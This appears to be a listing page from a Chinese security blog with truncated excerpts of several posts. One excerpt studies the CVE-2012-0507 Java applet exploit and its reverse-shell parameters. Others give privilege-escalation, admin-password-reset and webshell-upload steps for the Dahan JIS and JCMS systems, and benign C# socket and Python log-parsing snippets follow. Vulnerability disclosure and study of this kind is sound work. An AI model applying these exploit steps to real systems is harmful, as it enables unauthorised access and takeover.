2014-05-01 15:24:21

Cve 2012 0507 利用EXP

http://www.iswin.org/?p=204 这个漏洞很早了,msf上面有exp,正好最近在看java的安全相关的东西,就拿来学习下。 关于这个漏洞的详细分析请戳http://wcf1987.iteye.com/blog/1749088。msf上面的利用脚本是基于msf平台的,如果想要挂马的话还的修改下,通过msf的利用页面上可以看到 一个标准的applet程序,有关applet的知识请戳http://zh.wikipedia.org/wiki/Java_applet,主要有这几个属性这几个属性<applet archive="IIdXY.jar" code="msf.x.Exploit.class" width="1" height="1"> archive属性是远程加载的jar包,code是applet程序入口所在的类,<param name="jar" value="…" /><param name="lhost" value="10.11.171.76" /><param name="lport" value="4444" /

2014-02-08 22:51:28

大汉通版jis统一身份认证系统漏洞打包

对该系统部分功能抓包时发现: POST: http://10.11.5.201:9080/jis/front/upduser_do.jsp CONTENT: c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname= 经过验证c_id为权限控制字段,00000为管理员,vc_loginid为登陆名称,vc_password以及 vc_pwd为密码, (1)用户权限提升: 在修改个人信息时进行抓包,将c_id修改成0000,即可提升为系统管理员 (2)重置管理员密码 将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可 (3)任意文件上传漏洞 上传地址:http://url//jis/update/update.jsp shell地址:http://www.iswin.org/jis/update/da

2014-02-08 22:50:21

大汉通版jcms任意文件上传漏洞

问题出在导入xml文件时,只是采用了本地js验证,没有进行服务端验证,而且对文件的访问权限没有进行任何控制,服务端也没有对上传文件的有效性进行检查导致任意文件上传. 上传地址:http://www.iswin.org/jcms/m_5_5/m_5_5_3/import_style.jsp Shell地址http://www.iswin.org/jcms/m_5_5/m_5_5_3/temp/upload/后门文件名

2014-02-08 22:49:50

2013-11-28 12:53:13

C# Socket小例子

程序分为服务端和客户端两部分,实现的功能很简单,客户端发送相应的指令,服务端接受执行后将结果返回给客户端! 服务端代码: using System; using System.Collections.Generic; using System.Net; using System.Net.Sockets; using System.Text; namespace Server { class Program { static void Main(string[] args) { Socket server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPEndPoint point = new IPEndPoint(IPAddress.Parse(&quot;127.0.0.1&quot;),55555); try { server.Bind(point); server.Listen(10); //监听本地端口

2013-11-28 12:51:52

python 统计日志中ip访问次数

程序主要功能是统计日志中(这里默认为nginx其他日志格式自行修改)ip访问次数,并且可以按次数次数由高到低输出,例如 统计访问评论最高的前5条 :python log.py acess.log 5即可。 import sys class Log: def __init__(self, filename,dic,count): self.filename = filename self.dic=dic self.count=count def parse(self): i=1 f=file(self.filename) while True: line=f.readline() if len(line)==0: break ip=line.split(' ') if ip[0] in dic: self.dic[ip[0]]=self.dic[ip[0]]+1 else: self.dic[ip[0]]=i soredic=sorted(self.dic.items(), key=lambda d:d[1],reverse=True) counts=0; for item in soredic: if counts==int(self.count): b